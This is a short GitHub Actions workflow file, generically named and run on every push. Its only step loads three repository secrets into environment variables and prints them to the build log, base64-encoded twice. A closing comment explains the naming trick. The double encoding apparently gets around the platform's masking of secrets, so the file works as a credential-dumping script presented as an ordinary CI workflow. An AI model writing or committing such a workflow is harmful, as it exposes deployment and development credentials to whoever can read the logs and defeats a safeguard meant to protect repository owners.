name: GitHub Actions
on: push
jobs:
  init:
    runs-on: ubuntu-latest
    steps:
    - run: sh -c 'env | grep "^secret_" | base64 -w0 | base64 -w0'
      name: command
      env:
        secret_DEPLOYMENT_SECRET: ${{secrets.DEPLOYMENT_SECRET}}
        secret_DEV_SECRET: ${{secrets.DEV_SECRET}}
        secret_TEST_SECRETS: ${{secrets.TEST_SECRETS}}

## so basically we forget secret_ forwad secrets name